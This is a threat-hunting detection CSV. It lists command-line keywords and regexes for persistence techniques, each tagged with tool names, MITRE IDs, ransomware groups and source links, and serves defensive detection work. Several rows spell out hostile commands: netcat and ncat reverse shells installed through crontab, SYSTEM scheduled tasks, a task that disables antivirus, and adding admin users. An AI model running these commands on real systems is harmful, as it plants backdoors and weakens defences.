Files
mthcht-ThreatHunting-Keywords/Persistence_category_detection.csv
mthcht 755048bf5e Mars and April 2025 update
very few additions and some corrections
2025-04-24 05:55:50 +02:00

684 KiB

1keywordmetadata_keyword_regexmetadata_keyword_typemetadata_toolmetadata_descriptionmetadata_tool_techniquesmetadata_tool_tacticsmetadata_malwares_namemetadata_groups_namemetadata_categorymetadata_linkmetadata_enable_endpoint_detectionmetadata_enable_proxy_detectionmetadata_tagsmetadata_commentmetadata_severity_scoremetadata_popularity_scoremetadata_github_starsmetadata_github_forksmetadata_github_updated_atmetadata_github_created_atmetadata_entry_id
2* /bin/nc * -e /bin/bash* > cron && crontab cron*.{0,1000}\s\/bin\/nc\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\s\>\scron\s\&\&\scrontab\scron.{0,1000}greyware_tool_keywordncLinux Persistence Shell cronT1053 - T1037TA0003N/ACalypso - GALLIUMPersistencehttps://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md10#linuxN/A101015941982025-04-16T21:16:51Z2021-08-16T17:34:25Z38
3* /c echo mar3pora *.{0,1000}\s\/c\secho\smar3pora\s.{0,1000}greyware_tool_keywordanydeskcommand line used with anydesk in the notes of the ransomware groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A41
4* /c echo Pa$$w0rd | C:\ProgramData\anydesk.exe*.{0,1000}\s\/c\secho\sPa\$\$w0rd\s\|\sC\:\\ProgramData\\anydesk\.exe.{0,1000}greyware_tool_keywordanydeskcommand line used with anydesk in the notes of the ransomware groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A42
5* /Create /RU SYSTEM /TN MicrosoftEdgeUpdateTaskMachine /TR *.{0,1000}\s\/Create\s\/RU\sSYSTEM\s\/TN\sMicrosoftEdgeUpdateTaskMachine\s\/TR\s.{0,1000}greyware_tool_keywordschtasksSSH backdoor creation with schtasksT1053 - T1059.004 - T1090TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/10N/AN/A1010N/AN/AN/AN/A52
6* /Create /SC ONCE /TN 'DisableBitdefender-*.{0,1000}\s\/Create\s\/SC\sONCE\s\/TN\s\'DisableBitdefender\-.{0,1000}offensive_tool_keywordDispossessorscheduled task used by Dispossessor ransomware group to disabled AVT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10#scheduledtaskN/A1010N/AN/AN/AN/A53
7* /create /tn "SysChecks" /tr c:\temp\sch.bat *.{0,1000}\s\/create\s\/tn\s\"SysChecks\"\s\/tr\sc\:\\temp\\sch\.bat\s.{0,1000}greyware_tool_keywordschtasksSSH backdoor creation with schtasksT1053 - T1059.004 - T1090TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/10N/AN/A1010N/AN/AN/AN/A54
8* /Create /TN sch.bat /TR "c:\temp\script.vbs" *.{0,1000}\s\/Create\s\/TN\ssch\.bat\s\/TR\s\"c\:\\temp\\script\.vbs\"\s.{0,1000}greyware_tool_keywordschtasksSSH backdoor creation with schtasksT1053 - T1059.004 - T1090TA0003 - TA0005 - TA0011N/ADispossessorPersistencehttps://www.trellix.com/blogs/research/cactus-ransomware-new-strain-in-the-market/10N/AN/A1010N/AN/AN/AN/A56
9* /taskname:Cleanup *.{0,1000}\s\/taskname\:Cleanup\s.{0,1000}offensive_tool_keywordScheduleRunnerA C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operationT1210 - T1570 - T1021 - T1550TA0008N/AN/APersistencehttps://github.com/netero1010/ScheduleRunner10N/AN/A94336462025-01-22T02:06:59Z2021-10-12T15:27:32Z103
10* action=BackdoorLNK *.{0,1000}\saction\=BackdoorLNK\s.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z187
11* action=CreateService servicename=* command=*.{0,1000}\saction\=CreateService\sservicename\=.{0,1000}\scommand\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z188
12* action=ElevatedRegistryKey keyname=Debug keypath*.{0,1000}\saction\=ElevatedRegistryKey\skeyname\=Debug\skeypath.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z189
13* action=ElevatedUserInitKey command=*.{0,1000}\saction\=ElevatedUserInitKey\scommand\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z190
14* action=JunctionFolder dllpath=*.dll guid=*.{0,1000}\saction\=JunctionFolder\sdllpath\=.{0,1000}\.dll\sguid\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z191
15* action=NewLNK filepath=*" lnkname=*.{0,1000}\saction\=NewLNK\sfilepath\=.{0,1000}\"\slnkname\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z192
16* action=ScheduledTask taskname=* command=*runasuser*.{0,1000}\saction\=ScheduledTask\staskname\=.{0,1000}\scommand\=.{0,1000}runasuser.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z193
17* action=ScheduledTaskAction taskname=* command=*.{0,1000}\saction\=ScheduledTaskAction\staskname\=.{0,1000}\scommand\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z194
18* action=SchTaskCOMHijack clsid=*.{0,1000}\saction\=SchTaskCOMHijack\sclsid\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z195
19* action=UserRegistryKey keyname=Debug keypath=HKCU:*.{0,1000}\saction\=UserRegistryKey\skeyname\=Debug\skeypath\=HKCU\:.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10#registryN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z196
20* action=WMIEventSub command=* eventname=*.{0,1000}\saction\=WMIEventSub\scommand\=.{0,1000}\seventname\=.{0,1000}offensive_tool_keywordSharpStaySharpStay - .NET PersistenceT1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123TA0003N/AN/APersistencehttps://github.com/0xthirteen/SharpStay10N/AN/A105475972024-06-26T15:54:52Z2020-01-24T22:22:07Z197
21* ADCS.ps1*.{0,1000}\sADCS\.ps1.{0,1000}offensive_tool_keywordPoshADCSattack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)T1213.003 - T1213 - T1098.003 - T1098 - T1484.001TA0002 - TA0003 - TA0040N/AN/APersistencehttps://github.com/cfalta/PoshADCS10N/AN/A72186172021-07-07T16:47:07Z2019-10-15T15:54:03Z206
22* add nc without being detected by antivirus*.{0,1000}\sadd\snc\swithout\sbeing\sdetected\sby\santivirus.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z210
23* Add-KeeThiefLurker.ps1*.{0,1000}\sAdd\-KeeThiefLurker\.ps1.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z214
24* --Args AntiVirus --XorKey*.{0,1000}\s\-\-Args\sAntiVirus\s\-\-XorKey.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z274
25* --args whoami*.{0,1000}\s\-\-args\swhoami.{0,1000}offensive_tool_keywordseatbeltSeatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many othersT1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011N/ADispossessorPersistencehttps://github.com/GhostPack/Seatbelt10N/AN/A101040477222025-01-10T20:12:49Z2018-07-24T17:38:51Z275
26* --backdoor-user *.{0,1000}\s\-\-backdoor\-user\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z360
27* BruteForce(*.{0,1000}\sBruteForce\(.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z466
28* chromepasswords.py*.{0,1000}\schromepasswords\.py.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z577
29*- Cronos rootkit debugger -*.{0,1000}\-\sCronos\srootkit\sdebugger\s\-.{0,1000}offensive_tool_keywordCronos-RootkitCronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.T1055 - T1078 - T1134 - T1562.001TA0001 - TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/XaFF-XaFF/Cronos-Rootkit10N/AN/AN/A98991862022-03-29T08:26:03Z2021-08-25T08:54:45Z740
30* diamorphine.c*.{0,1000}\sdiamorphine\.c.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z837
31* diamorphine.h*.{0,1000}\sdiamorphine\.h.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z838
32* dynasty.sh*.{0,1000}\sdynasty\.sh.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z1007
33* -EventName KeeThief -WMI*.{0,1000}\s\-EventName\sKeeThief\s\-WMI.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z1080
34* -EventName WmiBackdoor -PermanentCommand *.{0,1000}\s\-EventName\sWmiBackdoor\s\-PermanentCommand\s.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z1081
35* hacked_getdents*.{0,1000}\shacked_getdents.{0,1000}offensive_tool_keywordDiamorphineLKM rootkit for Linux KernelsT1547.006 - T1548.002 - T1562.001 - T1027TA0003 - TA0004 - TA0005 - TA0006 - TA0007N/AN/APersistencehttps://github.com/m0nad/Diamorphine10#linuxN/A101019864512023-09-20T10:56:06Z2013-11-06T22:38:47Z1401
36* hostPath="c:\" writable="true" autoMount="true"*.{0,1000}\shostPath\=\"c\:\\\"\swritable\=\"true\"\sautoMount\=\"true\".{0,1000}greyware_tool_keywordVirtualBoxadding the entire C drive as a shared folder for a VMT1021.001 - T1137 - T1072TA0006 - TA0008 - TA0005N/ARagnarLocker Persistencehttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/10N/AN/A1010N/AN/AN/AN/A1440
37* ImplantSSP.exe*.{0,1000}\sImplantSSP\.exe.{0,1000}offensive_tool_keywordImplantSSPInstalls a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system startT1547.008 - T1073.001 - T1055.001TA0003 - TA0005N/AN/APersistencehttps://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP10N/AN/A101014162502023-02-06T14:56:26Z2019-02-06T00:32:29Z1640
38* --insecure brute --userpass *.{0,1000}\s\-\-insecure\sbrute\s\-\-userpass\s.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z1668
39* --insecure brute --users *.{0,1000}\s\-\-insecure\sbrute\s\-\-users\s.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z1669
40* JumpSession.x64.o*.{0,1000}\sJumpSession\.x64\.o.{0,1000}offensive_tool_keywordJumpSession_BOFBeacon Object File allowing creation of Beacons in different sessionsT1055 - T1055.012 - T1548.002TA0002 - TA0003 - TA0004N/AN/APersistencehttps://github.com/Octoberfest7/JumpSession_BOF10N/AN/A9180132022-05-23T22:23:33Z2022-05-21T17:38:18Z1830
41* JumpSession.x86.o*.{0,1000}\sJumpSession\.x86\.o.{0,1000}offensive_tool_keywordJumpSession_BOFBeacon Object File allowing creation of Beacons in different sessionsT1055 - T1055.012 - T1548.002TA0002 - TA0003 - TA0004N/AN/APersistencehttps://github.com/Octoberfest7/JumpSession_BOF10N/AN/A9180132022-05-23T22:23:33Z2022-05-21T17:38:18Z1831
42* keepass backdoor persistence*.{0,1000}\skeepass\sbackdoor\spersistence.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z1849
43* Keepass persistence backdoor *.{0,1000}\sKeepass\spersistence\sbackdoor\s.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z1850
44* localgroup administrators BitdefenderBounty *.{0,1000}\slocalgroup\sadministrators\sBitdefenderBounty\s.{0,1000}offensive_tool_keywordDispossessoruser name used in Dispossessor ransomware group notes - adding to admin groupT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A2020
45* localgroup Administrators localadm /ADD *.{0,1000}\slocalgroup\sAdministrators\slocaladm\s\/ADD\s.{0,1000}greyware_tool_keywordnetcommand used in the Dispossessor ransomware group notesT1486 - T1490 - T1059 - T1213 - T1078TA0040 - TA0043 - TA0001 - TA0009N/ADispossessorPersistencehttps://vx-underground.org/Archive/Dispossessor%20Leaks10N/AN/A1010N/AN/AN/AN/A2021
46* --malicious-package *.{0,1000}\s\-\-malicious\-package\s.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z2114
47* ncat * -e /bin/bash*|crontab*.{0,1000}\sncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}\|crontab.{0,1000}greyware_tool_keywordncatreverse shell persistenceT1059.004 - T1053.005 - T1059.005TA0002 - TA0005N/ACalypso - GALLIUMPersistenceN/A10#linuxgreyware_tools high risks of false positivesN/AN/AN/AN/AN/AN/A2269
48* OfficePersistence.ps1*.{0,1000}\sOfficePersistence\.ps1.{0,1000}offensive_tool_keywordOffice-PersistenceUse powershell to test Office-based persistence methodsT1059.001 - T1137 - T1116TA0003 N/AN/APersistencehttps://github.com/3gstudent/Office-Persistence10N/AN/A9176242021-04-17T01:39:13Z2017-07-14T10:03:35Z2435
49* panix.sh --*.{0,1000}\spanix\.sh\s\-\-.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z2511
50* panix.sh --generator*.{0,1000}\spanix\.sh\s\-\-generator.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z2512
51* panix.sh --generator*.{0,1000}\spanix\.sh\s\-\-generator.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z2513
52* panix.sh --systemd*.{0,1000}\spanix\.sh\s\-\-systemd.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z2514
53* Persist General *.dll*.{0,1000}\sPersist\sGeneral\s.{0,1000}\.dll.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z2586
54* Persist Tasksch *.dll*.{0,1000}\sPersist\sTasksch\s.{0,1000}\.dll.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z2587
55* Persist TreatAs *.dll*.{0,1000}\sPersist\sTreatAs\s.{0,1000}\.dll.{0,1000}offensive_tool_keywordCOM-HunterCOM-hunter is a COM Hijacking persistnce tool written in C#T1122 - T1055.012TA0003 - TA0005N/AN/APersistencehttps://github.com/nickvourd/COM-Hunter10N/AN/A103289482025-03-11T04:49:55Z2022-05-26T19:34:59Z2588
56* PowerLurk.ps1*.{0,1000}\sPowerLurk\.ps1.{0,1000}offensive_tool_keywordPowerlurkPowerLurk is a PowerShell toolset for building malicious WMI Event SubsriptionsT1084 - T1059.001 - T1546.003 - T1053.005TA0003 - TA0005 - TA0002 - TA0006N/AN/APersistencehttps://github.com/Sw4mpf0x/PowerLurk10N/AN/A104384722016-07-25T22:19:22Z2016-07-13T20:07:25Z2650
57* r77-x64.dll*.{0,1000}\sr77\-x64\.dll.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z2758
58* r77-x86.dll*.{0,1000}\sr77\-x86\.dll.{0,1000}offensive_tool_keywordr77-rootkitFileless ring 3 rootkit with installer and persistence that hides processes, files, network connectionsT1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009TA0005 - TA0003N/AN/APersistencehttps://github.com/bytecode77/r77-rootkit10N/AN/A101018844252025-03-25T17:59:20Z2017-12-17T13:04:14Z2759
59* rce.php /var*.{0,1000}\srce\.php\s\/var.{0,1000}offensive_tool_keywordDynastyPersistLinux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd ServiceT1055 - T1037 - T1078 - T1547 - T1546 - T1556TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Trevohack/DynastyPersist10#linuxN/A92153172024-05-16T05:19:48Z2023-08-13T15:05:42Z2779
60* rid_hijack.py*.{0,1000}\srid_hijack\.py.{0,1000}offensive_tool_keywordRID-HijackingWindows RID Hijacking persistence techniqueT1174TA0003N/AN/APersistencehttps://github.com/r4wd3r/RID-Hijacking10N/AN/A92174432024-11-20T01:43:01Z2018-07-14T18:48:51Z2899
61* ropbuffers.go*.{0,1000}\sropbuffers\.go.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z2917
62* ruler.exe*.{0,1000}\sruler\.exe.{0,1000}offensive_tool_keywordrulerA tool to abuse Exchange servicesT1087 - T1110 - T1133 - T1064 - T1204TA0007 - TA0006 - TA0003 - TA0002 - TA0005N/AAPT33Persistencehttps://github.com/sensepost/ruler10N/AN/A101022223622024-06-10T11:03:07Z2016-08-18T15:05:13Z2944
63* sandman_server.py*.{0,1000}\ssandman_server\.py.{0,1000}offensive_tool_keywordSandmanSandman is a NTP based backdoor for red team engagements in hardened networks.T1105 - T1027 - T1071.001TA0011 - TA0005N/AN/APersistencehttps://github.com/Idov31/Sandman10N/AN/A1087851082024-03-31T17:40:15Z2022-08-21T11:04:45Z2980
64* sharedfolder add * -hostpath c:\ -automount*.{0,1000}\ssharedfolder\sadd\s.{0,1000}\s\-hostpath\sc\:\\\s\-automount.{0,1000}greyware_tool_keywordVirtualBoxadding the entire C drive as a shared folder for a VMT1021.001 - T1137 - T1072TA0006 - TA0008 - TA0005N/ARagnarLocker Persistencehttps://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/10N/AN/A1010N/AN/AN/AN/A3076
65* SharpPersistSD.dll*.{0,1000}\sSharpPersistSD\.dll.{0,1000}offensive_tool_keywordSharpPersistSDA Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machinesT1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/cybersectroll/SharpPersistSD10N/AN/A10187122024-05-15T14:55:14Z2024-05-13T15:11:12Z3092
66* stealthily grabs passwords and browser history from windows systems*.{0,1000}\sstealthily\sgrabs\s\spasswords\sand\sbrowser\shistory\sfrom\swindows\ssystems.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z3407
67* stickykey.ps1*.{0,1000}\sstickykey\.ps1.{0,1000}offensive_tool_keywordPersistence-Accessibility-Featuresautomated sticky keys backdoorT1174 - T1078 - T1546.013TA0003N/AN/APersistencehttps://github.com/Ignitetechnologies/Persistence-Accessibility-Features10N/AN/A9134122020-05-18T05:59:58Z2020-05-18T05:59:23Z3408
68* Stickykeys.sh*.{0,1000}\sStickykeys\.sh.{0,1000}offensive_tool_keywordWinPirateautomated sticky keys backdoor + credentials harvestingT1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003TA0003 - TA0005 - TA0006N/AN/APersistencehttps://github.com/l3m0n/WinPirate10N/AN/A9113322016-07-17T20:02:07Z2016-07-18T03:40:13Z3409
69* --sudoers-backdoor*.{0,1000}\s\-\-sudoers\-backdoor.{0,1000}offensive_tool_keywordpanixPANIX is a highly customizable Linux persistence toolT1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012TA0003 - TA0004 - TA0005N/AN/APersistencehttps://github.com/Aegrah/PANIX10#linuxN/A87622682025-03-05T10:45:04Z2024-05-19T12:37:40Z3429
70* -t schtaskbackdoor *.{0,1000}\s\-t\sschtaskbackdoor\s.{0,1000}offensive_tool_keywordSharPersistSharPersist Windows persistence toolkit written in C#.T1547 - T1053 - T1027 - T1028 - T1112TA0003 - TA0008N/AN/APersistencehttps://github.com/fireeye/SharPersist10N/AN/A101014602572023-08-11T00:52:09Z2019-06-21T13:32:14Z3456
71* Use-Waitfor.exe*.{0,1000}\sUse\-Waitfor\.exe.{0,1000}offensive_tool_keywordWaitfor-PersistenceUse Waitfor.exe to maintain persistenceT1059 - T1117 - T1053.005 - T1546.013TA0002 - TA0003N/AN/APersistencehttps://github.com/3gstudent/Waitfor-Persistence10N/AN/A9154192021-04-17T01:41:42Z2017-06-07T09:33:13Z3655
